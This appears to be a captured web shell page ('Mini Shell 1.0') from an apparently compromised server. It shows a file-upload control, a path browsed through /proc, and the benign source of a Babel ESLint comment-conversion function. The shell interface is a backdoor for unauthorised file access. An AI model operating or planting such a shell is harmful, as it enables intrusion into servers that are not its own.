HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/1784574/root/usr/share/node_modules/@babel/eslint-parser/lib/convert/
Upload File :
Current File : //proc/1784574/root/usr/share/node_modules/@babel/eslint-parser/lib/convert/convertComments.cjs
module.exports = function convertComments(comments) {
  for (const comment of comments) {
    if (comment.type === "CommentBlock") {
      comment.type = "Block";
    } else if (comment.type === "CommentLine") {
      comment.type = "Line";
    }
    if (!comment.range) {
      comment.range = [comment.start, comment.end];
    }
  }
};

//# sourceMappingURL=convertComments.cjs.map